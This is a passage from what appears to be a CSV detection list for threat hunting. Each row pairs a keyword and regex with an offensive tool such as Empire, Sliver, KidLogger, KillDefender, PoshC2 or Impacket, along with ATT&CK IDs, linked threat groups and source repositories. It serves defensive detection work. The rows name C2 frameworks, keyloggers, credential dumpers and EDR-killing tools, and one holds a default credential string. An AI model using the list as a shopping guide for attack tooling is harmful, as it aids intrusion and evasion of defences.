"*Kicking off download cradle in a new process*",".{0,1000}Kicking\soff\sdownload\scradle\sin\sa\snew\sprocess.{0,1000}","offensive_tool_keyword","empire","empire script command. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50444"
"*kick-operator -n *",".{0,1000}kick\-operator\s\-n\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","50445"
"*KidLogger-*.dmg*",".{0,1000}KidLogger\-.{0,1000}\.dmg.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","#macos","N/A","10","10","N/A","N/A","N/A","N/A","50446"
"*kidlogger.conf*",".{0,1000}kidlogger\.conf.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50447"
"*Kidlogger.exe*",".{0,1000}Kidlogger\.exe.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50448"
"*KidLogger.lnk*",".{0,1000}KidLogger\.lnk.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50449"
"*KidLogger.net*",".{0,1000}KidLogger\.net.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50450"
"*KidLogger.pif*",".{0,1000}KidLogger\.pif.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50451"
"*KidLogger.url*",".{0,1000}KidLogger\.url.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50452"
"*kidlogger_install*",".{0,1000}kidlogger_install.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50453"
"*kidlogger_user.exe*",".{0,1000}kidlogger_user\.exe.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50454"
"*Kill CacheDump service (shouldn't be used)*",".{0,1000}Kill\sCacheDump\sservice\s\(shouldn\'t\sbe\sused\).{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#content","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","50455"
"*killAllNimplants*",".{0,1000}killAllNimplants.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","50459"
"*killdefender check*",".{0,1000}killdefender\scheck.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","N/A","10","10","66","15","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z","50460"
"*killdefender kill*",".{0,1000}killdefender\skill.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","N/A","10","10","66","15","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z","50461"
"*KillDefender.h*",".{0,1000}KillDefender\.h.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","N/A","10","3","224","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z","50462"
"*KillDefender.x64*",".{0,1000}KillDefender\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50463"
"*KillDefender.x64.*",".{0,1000}KillDefender\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","N/A","10","10","66","15","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z","50464"
"*killdefender_bof*",".{0,1000}killdefender_bof.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50465"
"*KillDefender_BOF*",".{0,1000}KillDefender_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","N/A","10","10","66","15","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z","50466"
"*KillDefenderBOF-main*",".{0,1000}KillDefenderBOF\-main.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","N/A","10","3","224","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z","50467"
"*Killed running eventvwr*",".{0,1000}Killed\srunning\seventvwr.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-EventVwrBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50468"
"*Killed running sdclt*",".{0,1000}Killed\srunning\ssdclt.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-SDCLTBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50469"
"*Killer tool for EDR/AV Evasion --> IAT Obfuscation*",".{0,1000}Killer\stool\sfor\sEDR\/AV\sEvasion\s\-\-\>\sIAT\sObfuscation.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","50470"
"*KillEvenlogService {*",".{0,1000}KillEvenlogService\s\{.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","50471"
"*kill-implant*",".{0,1000}kill\-implant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","50472"
"*Killing ngrok tunnel*",".{0,1000}Killing\sngrok\stunnel.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","#content","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","50473"
"*killme:qAuxiAwegDsZI*",".{0,1000}killme\:qAuxiAwegDsZI.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","50474"
"*killprocess.py*",".{0,1000}killprocess\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","50475"
"*KILLREMOTESHELL*",".{0,1000}KILLREMOTESHELL.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","50476"
"*kimi_MDPC/kimi.py*",".{0,1000}kimi_MDPC\/kimi\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","50477"
"*KINGSABRI/ServerlessRedirector*",".{0,1000}KINGSABRI\/ServerlessRedirector.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","N/A","N/A","10","1","72","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z","50480"
"*kintercept.py*",".{0,1000}kintercept\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50481"
"*kintercept.py*",".{0,1000}kintercept\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50482"
